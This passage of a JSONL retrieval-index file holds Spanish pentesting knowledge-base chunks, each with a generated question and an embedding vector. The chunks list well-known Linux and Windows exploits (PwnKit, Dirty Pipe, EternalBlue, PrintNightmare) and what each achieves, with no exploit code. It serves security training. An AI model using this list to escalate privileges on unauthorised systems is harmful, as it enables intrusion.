0.01467, 0.01752, -0.00115, 0.00848, -0.02293, 0.04805, -0.05006, -0.05405, -0.01961, 0.06059, -0.04355, 0.02179, -0.03453, -0.05386, -0.03635, -0.02801, 0.04053, 0.02457, -0.05484, -0.01492, -0.05312, -0.03143, -0.01396, -0.03008, -0.04884, -0.069, 0.03268, 0.03777, -0.03163, 0.0134, -0.05508]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Exploits conocidos (CVEs)\n\n> Exploits pΓΊblicos que aparecen una y otra vez. LocalΓ­zalos con searchsploit y **lΓ©elos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "indexar": "quΓ© programa sirve para localizar exploits pΓΊblicos conocidos?", "v": [0.05029, 0.03125, -0.17896, -0.16362, 0.12042, -0.16338, 0.06405, -0.08839, -0.0922, -0.09602, 0.05048, -0.04386, 0.00917, 0.05961, -0.01191, -0.10333, 0.11139, -0.08207, 0.11208, 0.01022, -0.06307, 0.07464, 0.04002, -0.09018, -0.06741, 0.02395, 0.04441, -0.08559, -0.03909, -0.00175, -0.06615, 0.0583, -0.05514, -0.08098, 0.05677, 0.04672, 0.15484, -0.09364, -0.03078, 0.09545, 0.08875, -0.07297, -0.04555, -0.0159, 0.05995, -0.0215, -0.07527, -0.0333, -0.02301, -0.06402, -0.04666, -0.0095, -0.07844, -0.05438, 0.03588, -0.1085, -0.09621, 0.04402, -0.17288, 0.11191, -0.07702, -0.10766, 0.04777, -0.04144, 0.07031, -0.07266, 0.14769, 0.08325, -0.09049, 0.03684, -0.02831, 0.05057, 0.15405, 0.01624, -0.05776, 0.01564, 0.01789, -0.04885, 0.00498, -0.00981, -0.0082, -0.0341, -0.03503, 0.00646, -0.04296, 0.00496, 0.04563, -0.01599, -0.01315, -0.03548, 0.03241, 0.095, 0.0043, 0.05755, 0.0608, 0.02344, 0.1564, 0.01066, -0.05036, 0.13789, 0.02951, -0.13825, -0.12441, 0.02832, -0.06795, 0.07817, 0.01562, -0.038, -0.09666, 0.04494, 0.03385, -0.0173, -0.08639, 0.02103, -0.0008, 0.06025, 0.00232, -0.02991, 0.01237, -0.02823, -0.14099, -0.00346, -0.04442, -0.00102, 0.10612, -0.01619, 0.01864, 0.03423, 0.00293, 0.01897, 0.06465, 0.05535, 0.0465, 0.08115, -0.0412, -0.10558, 0.05994, -0.05108, -0.02245, -0.04866, 0.0766, 0.06237, -0.03818, -0.00072, -0.05332, -0.00811, 0.11896, -0.06042, 0.05283, -0.00658, 0.02248, -0.06535, -0.09475, 0.02761, -0.01111, -0.0765, 0.01311, -0.0117, -0.08428, 0.04244, -0.08209, -0.0346, -0.03994, -0.06078, 0.06021, -0.01455, -0.01266, 0.01651, 0.0958, 0.12266, 0.04586, 0.06944, 0.07569, -0.08334, 0.06041, -0.06642, -0.06155, -0.04899, 0.04617, 0.03595, -0.07639, 0.00047, 0.12101, 0.08313, 0.0096, -0.02348, 0.01341, -0.0337, 0.02545, -0.0525, 0.02548, -0.10995, 0.07327, -0.00162, -0.00645, -0.02105, 0.00057, 0.00742, 0.06384, -0.03548, -0.01674, -0.01528, -0.02177, 0.01418, 0.07948, 0.05643, -0.0082, -0.00574, 0.0252, 0.13438, 0.00245, 0.00848, 0.04791, 0.01445, -0.01649, 0.01345, -0.0056, 0.05591, 0.01878, -8e-05, -0.03557, 0.01158, 0.03184, 0.04603, -0.00968, -0.06599, -0.01089, -0.04045, -0.00099, -0.03079, -0.00762, -0.03264, 0.01799, -0.01857, -0.01732, -0.07377, -0.04295, -0.032, 0.00108, -0.06839, -0.04712, 0.06511, 0.007, -0.06351, -0.00366, 0.0059, -0.01386, -0.03813, -0.00722, 0.01089, -0.02236, 0.02513, -0.01329, -0.0324, 0.06657, 0.01848]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Exploits conocidos (CVEs)\n\n> Exploits pΓΊblicos que aparecen una y otra vez. LocalΓ­zalos con searchsploit y **lΓ©elos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "indexar": "con quΓ© puedo buscar exploits de vulnerabilidades recurrentes antes de usarlos?", "v": [0.23433, 0.16377, -0.16405, 0.0468, 0.06681, 0.06457, -0.10612, -0.0329, -0.01685, -0.08413, -0.04848, -0.08386, -0.11728, 0.11662, -0.07652, -0.0517, 0.00261, -0.0113, -0.00579, -0.04811, 0.01707, -0.12598, -0.02509, 0.0038, -0.10396, 0.0545, -0.02951, -0.12295, -0.06876, -0.04859, -0.10874, 0.09791, 0.03452, -0.04158, -0.09087, 0.0817, 0.00309, 0.04083, 0.06546, 0.06985, 0.13933, 0.01081, -0.20051, -0.00964, 0.09277, -0.0802, -0.14673, -0.08718, -0.04603, 0.02969, -0.03381, -0.099, -0.22973, -0.05414, 0.01814, -0.03724, 0.11723, -0.0411, -0.02757, -0.02393, -0.10014, -0.00211, 0.09458, 0.04509, 0.04908, -0.17002, 0.04235, 0.02565, -0.12215, 0.13434, -0.02948, 0.05199, -0.02691, 0.06459, 0.02844, 0.02498, 0.01204, -0.01914, 0.01082, 0.04966, -0.0672, 0.00906, 0.00572, 0.0612, -0.16593, -0.08547, 0.09515, 0.03418, 0.03108, -0.08831, 0.05263, 0.01468, -0.04, -0.02402, -0.00664, -0.0436, 0.09054, 0.05762, -0.06519, 0.06871, -0.07029, -0.0733, -0.01376, 0.12223, -0.00556, -0.01611, -0.02523, -0.00498, -0.00392, -0.08617, -0.0596, -0.07758, -0.08212, -0.03379, 0.03872, 0.1067, -0.06737, -0.08133, 0.07146, -0.06727, -0.04345, -0.05453, -0.01948, 0.01449, 0.0964, 0.01264, 0.02946, 0.01738, 0.0211, -0.03922, -0.00862, 0.0059, -0.01765, 0.02173, -0.00144, -0.01907, 0.04561, -0.03429, -0.04323, -0.05924, 0.09333, 0.03016, -0.00622, 0.01309, 0.00866, 0.09413, -0.00135, 0.00412, -0.03264, -0.03339, -0.02266, -0.03941, -0.04631, 0.02766, -0.00933, -0.02935, -0.0019, -0.0815, -0.00796, 0.042, 0.02043, 0.02958, 0.01656, 0.08839, -0.00836, -0.0407, 0.04204, -0.00496, 0.0033, 0.04385, 0.00416, 0.05018, 0.02309, -0.03609, 0.04305, -0.09167, -0.00802, -0.00969, 0.00164, -0.03822, -0.0462, -0.01739, 0.01526, 0.03856, -0.0388, -0.04443, 0.04328, 0.03414, 0.05022, 0.00035, 0.01619, -0.03537, 0.07836, 0.06121, 0.02314, -0.03744, -0.03516, 0.01384, -0.0485, -0.09185, -0.06263, -0.00098, -0.05051, -0.01741, 0.12941, 0.00282, -0.05255, -0.01839, -0.04831, 0.0658, 0.00812, 0.00371, 0.07903, -0.06072, -0.11646, -0.01741, 0.02402, 0.05456, -0.03704, -0.02524, 0.03288, 0.04754, 0.03642, 0.00887, 0.0179, 0.01329, -0.04441, -0.03153, 0.02015, 0.05118, -0.00431, 0.03064, -0.06654, -0.04187, -0.00411, -0.02137, 0.02343, -0.02229, 0.00093, 0.02846, 0.00653, 0.03839, 0.017, -0.03855, 0.01021, -0.03203, -0.06701, 0.00166, -0.04242, -0.03684, 0.00332, -0.00499, -0.01147, -0.09243, 0.03401, -0.05635]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Exploits conocidos (CVEs)\n\n> Exploits pΓΊblicos que aparecen una y otra vez. LocalΓ­zalos con searchsploit y **lΓ©elos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "indexar": "cual es una herramienta para verificar exploits comunes en CVEs?", "v": [-0.04333, 0.04435, -0.15052, -0.08759, 0.0978, -0.17805, 0.08433, 0.04245, -0.0094, -0.21315, -0.07182, -0.09065, -0.1494, 0.02461, 0.09493, 0.05802, 0.15206, -0.19902, 0.06298, 0.07558, 0.03635, -0.10065, 0.00829, 0.05463, -0.13288, 0.18595, -0.1356, -0.07241, -0.11164, -0.02649, 0.033, 0.10048, 0.01846, 0.00209, -0.01276, -0.01888, -0.05611, -0.00088, 0.01036, 0.02544, 0.09109, -0.00222, -0.13346, -0.00618, 0.0732, -0.13524, -0.0924, -0.05815, -0.01187, 0.01648, -0.02155, 0.00404, -0.17618, -0.05125, -0.05317, -0.06338, 0.05694, -0.01533, 0.01838, -0.11341, -0.08003, -0.05032, -0.05013, -0.01005, -0.06565, -0.07057, 0.02652, -0.04213, -0.13344, 0.06095, -0.03871, 0.13358, 0.011, -0.02243, -0.0534, -0.14066, 0.04384, -0.04554, 0.06769, 0.0179, 0.06243, -0.02662, -0.01675, 0.00097, -0.10084, -0.10475, 0.05812, -0.02635, 0.00119, -0.05569, -0.01049, 0.05486, -0.01812, 0.02004, 0.0404, -0.00667, 0.09644, 0.01387, -0.01463, 0.03316, 0.06801, -0.12707, -0.07091, 0.04745, -0.09158, 0.01398, -0.0635, -0.01676, -0.11252, -0.03664, 0.0969, -0.02184, -0.04339, 0.03539, 0.04286, 0.07883, -0.04962, -0.1196, 0.00696, -0.09392, -0.02313, -0.00538, -0.06054, -0.01874, 0.08037, -0.00631, -0.04439, 0.04398, 0.02964, -0.01529, -0.01987, 0.00032, -0.07387, 0.01027, -0.00947, -0.0502, 0.0326, -0.13238, 0.00481, -0.09149, 0.00359, 0.03574, -0.00461, -0.10917, 0.11484, 0.08061, -0.02456, -0.04387, -0.07971, 0.04195, 0.04043, -0.05612, -0.00686, 0.06103, -0.00506, 0.01966, 0.00437, 0.00063, -0.01383, 0.04639, 0.01967, -0.07239, 0.04191, -0.04338, 0.01233, -0.03687, 0.03427, -0.03522, 0.10363, -0.00016, 0.06337, 0.01271, 0.10142, -0.0309, 0.04211, -0.0683, -0.05352, -0.00291, 0.02704, -0.05629, -0.05681, 0.02712, 0.00676, 0.02641, 0.00864, -0.01774, 0.07247, -0.0227, 0.03481, -0.01754, 0.02497, 0.00182, 0.03776, -0.01515, 0.02764, 0.02725, -0.00928, -0.04618, 0.01349, -0.05907, -0.04305, 0.00476, -0.04138, -0.09171, 0.04934, 0.04107, 0.03581, -0.05692, -0.03689, 0.01439, -0.0069, 0.02678, 0.00346, -0.02425, -0.05727, -0.02621, -0.01947, 0.02469, -0.07055, -0.04163, 0.00789, 0.01092, 0.05458, -0.03638, -0.02856, 0.03933, 0.00727, 0.03042, -0.00207, 0.03785, 0.02578, -0.02494, -0.00769, 0.00561, 0.05723, -0.00661, 0.04869, 0.00797, -0.00356, -0.02301, 0.00625, 0.03616, 0.05573, -0.00706, 0.00982, 0.00328, -0.03156, -0.02431, -0.05032, -0.08614, 0.04668, -0.01859, 0.03254, -0.0441, 0.05007, -0.06869]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) β†’ casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel β‰₯5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versiΓ³n: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "indexar": "quΓ© programa sirve para hacer un ataque de elevaciΓ³n de privilegios en Linux sin instalar nada extra?", "v": [0.01808, 0.12249, -0.21977, -0.14921, 0.03685, -0.13395, -0.08482, -0.02797, -0.15554, 0.03115, -0.0151, -0.11816, -0.02176, -0.07018, 0.0342, -0.12767, 0.01018, -0.10921, 0.05442, -0.02766, -0.10786, 0.08113, -0.10054, -0.10679, 0.02332, 0.05692, 0.00632, 0.00896, -0.02393, 0.01725, -0.04716, 0.07919, -0.00961, 0.00363, 0.07158, 0.02738, 0.03463, 0.00755, 0.107, 0.06237, 0.08163, -0.01519, -0.03445, 0.02658, -0.02581, -0.1796, 0.11073, -0.00078, 0.12102, -0.09213, 0.13587, 0.07005, 0.00015, -0.16355, 0.06737, -0.01151, 0.02632, -0.16583, 0.0111, 0.06063, -0.12466, 0.06818, -0.02883, -0.05327, 0.09553, 0.00439, -0.05619, -0.02147, -0.08049, -0.00289, -0.03134, 0.00821, 0.0395, -0.00701, 0.03067, 0.0613, -0.08429, 0.00947, 0.03562, -0.0626, 0.02379, 0.02455, -0.0509, -0.0081, -0.14524, -0.13667, 0.02138, 0.04022, -0.05333, 0.04071, 0.09498, 0.07506, 0.00337, -0.01023, 0.10477, -0.10324, 0.14037, 0.06619, 0.03527, 0.0404, 0.06292, -0.0719, -0.00498, 0.17551, 0.01651, 0.00366, 0.04277, -0.13886, -0.02275, -0.06648, 0.04254, -0.00249, 0.00367, -0.05153, -0.10278, -0.02666, -0.06315, 0.01436, -0.04386, 0.01746, -0.09645, -0.03326, -0.00447, 0.01834, -0.02128, -0.08857, -0.05012, 0.11642, -0.06062, 0.0267, 0.02341, -0.10647, 0.10614, 0.00691, -0.05745, -0.03064, 0.02978, -0.08731, -0.06466, -0.04324, 0.07579, 0.08719, -0.00439, -0.00755, 0.03728, 0.02044, -0.00284, -0.02544, -0.0401, -0.03241, 0.01886, 0.01329, 0.00923, 0.08903, -0.09193, -0.09972, 0.04344, -0.01199, -0.05977, 0.05673, -0.0045, -0.01495, -0.0226, 0.032, 0.03633, -0.00649, -0.03307, -0.04926, 0.07994, 0.06079, 0.01472, 0.06986, 0.00997, -0.08377, -0.00116, -0.07742, 0.01862, -0.03683, 0.05811, 0.05655, -0.05241, 0.05116, 0.08436, 0.0188, -0.00079, -0.03279, -0.03294, 0.01953, 0.02557, 0.01736, 0.01524, 0.01326, -0.03407, -0.0078, -0.02898, -0.02984, -0.048, -0.03143, -0.00447, 0.03185, -0.06327, -0.00786, 0.00431, -0.02778, 0.06289, 0.05405, -0.01845, -0.0329, 0.00501, 0.14189, -0.00015, 0.0365, 0.04644, -0.02124, 7e-05, 0.00167, 0.05004, 0.04453, 0.04467, -0.01675, -0.00222, -0.05679, 0.05087, 0.0508, 0.00243, -0.09531, -0.00832, -0.00309, 0.02075, 0.03108, 0.00422, -0.05567, 0.04051, 0.00171, 0.00535, -0.04778, 0.03857, 0.03164, -0.02946, -0.03929, -0.04585, 0.06433, 0.03012, -0.06657, -0.05927, -0.03323, -0.02877, -0.00016, -0.02714, -0.03425, -0.02077, 0.01025, 0.01039, -0.01717, 0.02737, 0.07676]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) β†’ casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel β‰₯5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versiΓ³n: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "indexar": "cΓ³mo puedo aprovechar las vulnerabilidades de pkexec o sudo contra una cuenta normal?", "v": [0.05848, 0.12417, -0.17965, -0.01737, 0.03152, -0.11233, 0.02395, -0.07081, -0.03774, -0.05747, -0.07893, -0.0583, -0.10408, -0.03788, -0.10763, -0.03633, -0.00486, -0.06389, 0.04756, 0.02208, 0.04155, -0.1386, 0.00855, -0.0363, 0.02642, 0.10802, 0.08828, 0.0518, -0.09406, -0.11581, -0.05734, -0.00261, 0.01174, -0.04273, 0.02005, 0.09046, 0.0421, 0.07519, 0.15396, 0.15212, 0.10677, 0.05079, -0.12585, -0.01624, 0.04106, -0.01911, -0.05208, -0.04167, 0.07692, -0.01375, -0.08252, -0.01888, -0.20569, -0.03861, -0.00329, 0.06695, 0.11262, -0.06225, 0.08295, -0.01645, -0.11286, 0.07688, 0.16254, 0.0778, 0.03189, -0.05137, -0.00877, 0.023, -0.1593, 0.13246, -0.11867, 0.0085, -0.08617, -0.02885, 0.05945, -0.04762, -0.01178, 0.05899, 0.03687, -0.02703, -0.04443, 0.02807, -0.05413, 0.02293, -0.19096, -0.09387, 0.07395, -0.07595, 0.02072, -0.09323, 0.08738, -0.03255, 0.01203, -0.05042, 0.06073, -0.10892, 0.05614, 0.04298, -0.06169, -7e-05, -0.06059, -0.02237, -0.04423, 0.09562, 0.0642, 0.05408, -0.02969, -0.03694, -0.02128, -0.0744, -0.06043, -0.01914, -0.08014, -0.01467, -0.04391, 0.0281, -0.10923, -0.03263, 0.00813, -0.01772, -0.09692, -0.10589, 0.0064, 0.02031, -0.0141, -0.05076, -0.01668, 0.08767, -0.04215, -0.04113, -0.00055, -0.02916, -0.0166, 0.00969, -0.05307, 0.0559, -0.01618, -0.07054, -0.10629, -0.05827, 0.04615, 0.03286, -0.01006, -0.03729, 0.01777, 0.01328, 0.02193, -0.09844, -0.12116, 0.04236, 0.04962, -0.04307, -0.0307, 0.06282, -0.09232, 0.01605, -0.06314, -0.07012, 0.05458, 0.03368, 0.01832, 0.04185, -0.02669, 0.04354, 0.0109, -0.02012, -0.01954, -0.03361, 0.07354, 0.02065, -0.04185, 0.12094, 0.07676, -0.05474, 0.00774, -0.11152, -0.03063, -0.06362, 0.03059, -0.02815, -0.00949, -0.01163, 0.00336, -0.00858, -0.04739, -0.00103, 0.02585, 0.00952, 0.04871, 0.01861, -0.03689, 0.02909, -0.01542, -0.00547, 0.0121, -0.02551, -0.07634, -0.00056, -0.00355, -0.07279, -0.06931, 0.00701, -0.05848, -0.06005, 0.07446, -0.00934, -0.0869, 0.0185, -0.04594, 0.0489, 0.02917, -0.03252, 0.1012, -0.05183, -0.10551, -0.02284, 0.03487, 0.00298, -0.00346, -0.05491, 0.03069, 0.05499, 0.04902, -0.00497, -0.01019, -0.02436, -0.02353, -0.06791, 0.02004, 0.07377, -0.03263, 0.01392, -0.05151, -0.04964, 0.03658, -0.01709, 0.0225, -0.01177, -0.00885, 0.00095, 0.06618, 0.06211, -0.0139, -0.07587, -0.01754, -0.00683, -0.05792, 0.0212, 0.00839, -0.05802, -0.0051, 0.08492, 0.07871, -0.03865, -0.00421, -0.03988]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) β†’ casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel β‰₯5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versiΓ³n: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "indexar": "quΓ© herramienta es ΓΊtil para comprobar si el sistema estΓ‘ susceptible a exploits de Dirty Pipe o Dirty COW?", "v": [-0.14085, 0.07978, -0.21068, -0.08327, 0.16127, -0.09544, 0.0091, 0.03435, -0.04396, -0.07979, -0.01868, 0.00122, -0.02797, -0.07606, -0.01356, -0.21884, -0.01711, -0.17173, -0.04041, -0.07074, -0.00115, 0.03685, -0.0634, -0.03079, -0.01215, 0.15941, 0.01944, -0.05343, -0.2265, 0.11095, -0.01624, 0.14084, 0.08076, -0.09356, -0.10069, -0.01116, 0.00827, 0.01044, 0.15812, 0.09298, 0.06968, -0.09108, -0.14421, 0.10305, 0.05731, -0.02298, -0.15951, -0.08153, 0.04681, 0.07205, -0.06302, -0.03448, -0.15799, -0.04407, 0.07064, -0.10998, 0.00124, -0.0732, 0.09007, -0.07473, 0.0284, -0.04731, -0.06335, -0.03169, 0.01545, -0.14914, 0.08105, -0.07555, -0.15356, 0.02638, -0.0417, 0.01841, 0.05119, 0.06173, -0.00744, -0.13844, 0.01983, 0.01074, 0.00191, -0.04133, -0.02966, 0.02444, -0.03861, 0.03843, 0.01342, -0.13895, 0.08879, -0.08166, 0.00682, -0.10317, 0.02385, 0.01734, 0.00612, 0.06548, 0.01166, -0.04221, 0.04117, 0.02068, 0.01857, -0.01629, -0.0387, -0.05078, -0.03999, 0.07058, -0.02301, 0.03499, -0.08493, 0.00137, 0.00408, -0.05508, -0.00217, 0.06769, -0.06817, -0.01801, 0.0407, 0.00131, -0.06189, -0.01377, -0.08932, -0.05134, -0.00011, 0.00443, -0.08119, -0.01658, 0.06811, 0.01328, -0.0328, 0.04763, 0.01289, -0.0052, -0.01594, -0.00273, -0.03764, 0.02716, -0.01307, -0.03744, 0.02186, -0.06147, -0.02875, -0.03257, -0.04536, 0.0565, 0.02004, -0.00677, 0.02507, 0.0175, 0.0587, -0.04051, -0.02175, -0.00773, 0.01629, -0.02175, -0.0502, 0.00988, 0.02164, -0.01434, 0.03987, -0.02581, -0.06613, -0.0067, -0.02004, -0.11398, 0.10721, -0.00851, 0.04204, 0.01344, 0.0294, -0.02599, 0.02575, 0.01613, 0.0122, 0.0679, 0.04332, 0.00751, 0.00044, -0.08524, 0.01642, -0.03959, 0.02494, -0.06269, -0.04022, -0.01978, 0.02472, -0.01822, 0.01446, 0.00511, 0.02787, -0.03406, 0.04656, 0.01909, 0.05095, 0.04683, 0.01204, -0.01218, -0.03163, -0.00425, -0.02669, -0.06458, -0.02307, -0.04456, -0.07676, 0.05436, -0.01199, -0.0786, 0.04526, 0.04976, 0.00959, -0.03259, -0.01194, 0.04838, 0.03864, -0.00667, 0.04761, -0.06019, -0.07529, -0.02103, -0.0106, 0.062, -0.04369, -0.00827, 0.05368, -0.00537, 0.03535, -0.02093, -0.01464, 0.00169, -0.01562, 0.06504, 0.02387, -0.01002, 0.01583, -0.06472, -0.01864, -0.01155, 0.01283, -0.09126, 0.0334, -0.05034, -0.0642, -0.06394, 0.0177, 0.06256, 0.03131, -0.03518, -0.00913, -0.06739, 0.00761, -0.03189, -0.02264, -0.12461, -0.01998, 0.02788, 0.04936, -0.10777, 0.04695, -0.06842]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) β†’ foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 β†’ privesc/RCE vΓ­a spooler\nSpoolFool CVE-2022-21999 β†’ privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) β†’ lee SAM como user\n```\nPotato family (SeImpersonate) β†’ ver Potato attacks.", "indexar": "quΓ© herramienta sirve para explotar fallos de seguridad en el servidor de archivos SMB?", "v": [0.07743, -0.09837, -0.12779, -0.18425, -0.0951, -0.20215, -0.11699, -0.17788, 0.05979, 0.02199, -0.19233, -0.0363, 0.07853, -0.05714, 0.04329, 0.08041, 0.09158, -0.13471, -0.04999, 0.02738, 0.02758, 0.0112, -0.02684, -0.08142, -0.11248, 0.00475, -0.03798, 0.03949, -0.17957, -0.00335, 0.00556, -0.02791, 0.08468, -0.0699, -0.00467, 0.02375, -0.04283, 0.07462, -0.07249, 0.08995, 0.04261, -0.00368, -0.0781, -0.02688, 0.01563, -0.07377, 0.03409, -0.06902, 0.11728, 0.06246, -0.05518, -0.19601, -0.08104, -0.01983, -0.01327, -0.06203, 0.10179, -0.17408, 0.02818, -0.02276, -0.22972, 0.00451, -0.00765, -0.08972, -0.00012, -0.09931, -0.03143, 0.02723, -0.09259, 0.00406, -0.04014, 0.05812, 0.05529, 0.05782, 0.00466, -0.0321, 0.03448, 0.03613, 0.04114, 0.06906, -0.00591, 0.02702, -0.08423, 0.0337, -0.09105, -0.07893, 0.0383, 0.02027, -0.0341, 0.00847, 0.02274, 0.10849, -0.00433, 0.02976, 0.01462, -0.04411, 0.14707, -0.05459, 0.025, -0.02533, 0.11686, -0.0261, -0.02564, 0.08345, 0.02998, 0.10786, -0.01099, 0.03579, 0.04887, -0.07156, 0.07763, 0.01749, 0.04597, 0.05727, -0.0999, -0.01156, -0.03917, -0.08527, 0.00611, 0.02655, -0.01004, 0.00399, 0.02611, -0.04223, -0.01174, -0.03148, 0.04234, 0.07029, -0.03029, -0.08454, 0.04061, -0.03864, -0.08795, 0.05975, -0.03749, -0.01632, 0.09375, -0.08922, -0.08865, -0.07862, 0.06933, -0.00556, -0.03669, -0.00054, 0.0728, 0.04907, 0.06126, -0.04619, -0.03872, -0.04025, 0.0432, -0.08456, -0.04476, -0.02, -0.07937, 0.00703, -0.06709, -0.04381, -0.06399, 0.07325, -0.01656, -0.01907, 0.061, 0.12035, 0.00048, -0.05581, 0.06888, 0.01322, 0.04518, 0.01617, 0.02825, 0.03304, 0.06652, -0.0911, -0.02157, -0.04527, -0.07596, -0.04497, 0.00906, -0.03976, -0.02499, -0.03656, -0.04438, 0.04773, 0.01407, -0.06888, 0.05733, -0.0204, -0.00093, 0.02654, 0.01008, 0.02336, -0.04774, 0.03042, -0.02158, -0.03003, -0.0101, -0.06405, -0.0156, -0.00402, -0.00832, -0.00974, -0.06248, -0.0291, 0.06714, 0.02705, -0.01903, 0.01079, 0.00319, -0.00987, 0.0348, -0.00532, 0.10896, -0.06573, -0.02767, -0.02931, 0.05098, 0.05282, -0.01085, -0.01525, 0.04249, 0.00398, 0.00692, -0.01579, -0.03292, 0.0261, -0.04274, -0.03781, 0.02547, 0.00919, 0.01017, 0.01162, -0.08545, 0.00811, 0.04207, -0.06658, 0.01764, -0.04262, -0.03207, -0.06905, -0.03478, 0.05102, 0.00504, -0.04001, -0.02834, -0.0527, 0.00602, -0.0271, -0.0031, -0.04553, 0.00087, -0.00534, 0.0104, -0.01639, 0.01592, -0.02025]} -{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) β†’ foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 β†’ privesc/RCE vΓ­a spooler\nSpoolFool CVE-2022-21999 β†’ privesc spooler\nHiveNightmare CVE-2021-36934 (SeriousSAM) β†’ lee SAM como user\n```\nPotato family (SeImpersonate) β†’ ver Potato attacks.", "indexar": "cΓ³mo puedo acceder al directorio del sistema usando exploits del spooler?", "v": [0.08162, 0.00442, -0.21868, -0.12834, -0.0145, -0.10746, -0.02174, -0.15037, -0.08888, 0.04359, -0.20007, -0.01422, -0.03725, -0.12502, -0.08144, -0.19073, 0.08663, -0.10831, -0.08626, 0.00217, -0.01081, 0.05064, -0.0875, -0.0387, -0.01479, 0.13214, -0.00208, -0.06244, -0.14364, -0.07329, -0.05931, 0.01127, 0.05059, -0.1268, -0.05155, -0.03027, 0.01912, 0.09161, 0.04888, 0.0393, -0.02106, -0.08536, -0.19739, 0.02754, 0.10879, -0.04934, -0.06638, -0.07165, -0.01083, -0.00016, -0.00366, -0.00952, -0.2256, -0.05268, 0.04677, -0.09816, 0.09732, -0.03323, 0.04185, 0.04203, -0.00224, 0.01331, -0.03192, 0.11215, 0.00497, -0.1501, -0.00119, -0.03948, -0.12052, 0.15365, -0.00473, 0.05168, 0.04168, 0.06487, 0.00231, -0.00218, 0.04983, 0.0026, 0.01338, 0.01768, -0.04127, -0.07055, -0.01722, -0.01794, -0.08571, -0.05238, 0.03989, -0.01578, -0.02517, -0.16602, 0.02787, -0.00745, -0.02917, 0.0502, 0.04374, -0.09006, -0.00492, 0.00826, -0.05613, 0.00419, -0.01256, -0.00399, -0.12876, 0.16811, 0.01194, 0.00431, 0.01994, -0.05571, -0.02353, -0.09273, -0.04768, 0.03827, -0.0126, -0.03155, 0.02062, 0.00966, -0.0388, -0.0972, -0.00268, -0.0316, -0.04836, -0.04788, -0.04194, -0.01519, 0.12, -0.04046, 0.06777, 0.08796, 0.01527, -0.02162, 0.00737, 0.05955, -0.0225, 0.01508, 0.03081, -0.0788, -0.03457, -0.00168, -0.00785, -0.0575, -0.02762, 0.07369, 0.00602, -0.04047, -0.02664, -0.00985, 0.07048, -0.10317, -0.03979, -0.07421, -0.00174, 0.0107, -0.09117, 0.00177, -0.00544, -0.05936, 0.04383, -0.0688, 0.01753, 0.00912, 0.0137, -0.03244, 0.01976, 0.04595, -0.05868, 0.01598, -0.02595, -0.07867, 0.0218, 0.01157, 0.00841, 0.10117, 0.02435, -0.00532, 0.05806, -0.04927, -0.03021, -0.06542, 0.02745, 0.0425, -0.04093, 0.07329, 0.01646, -0.02359, -0.05383, -0.0182, 0.02655, 0.00536, 0.04072, 0.02737, 0.08156, 0.01486, 0.03949, 0.03611, 0.00786, -0.04637, -0.06016, -0.00574, 0.04725, -0.02881, -0.03976, 0.05033, 0.04801, -0.04869, 0.06305, 0.04585, 0.01868, -0.00185, -0.02457, 0.06817, 0.05291, 0.05615, 0.04616, -0.02129, -0.11054, 0.06902, -0.03462, 0.03396, -0.00494, -0.09556, -0.00854, 0.00239, 0.03784, 0.03535, -0.0231, -0.0491, -0.02364, -0.01602, -0.06571, 0.02868, 0.00548, -0.00894, -0.00179, -0.01235, -0.0037, -0.02365, -0.03996, -0.00411, 0.00086, -0.02707, 0.02894, 0.1263, 0.02305, 0.01859, -0.01256, -0.05115, -0.06994, -0.0608, -0.02039, -0.04294, -0.01374, -0.00034, -0.00888, -0.04103, 0.01198, -0.02158]} -{"tipo": "pregunta", "herramienta": "Exploits 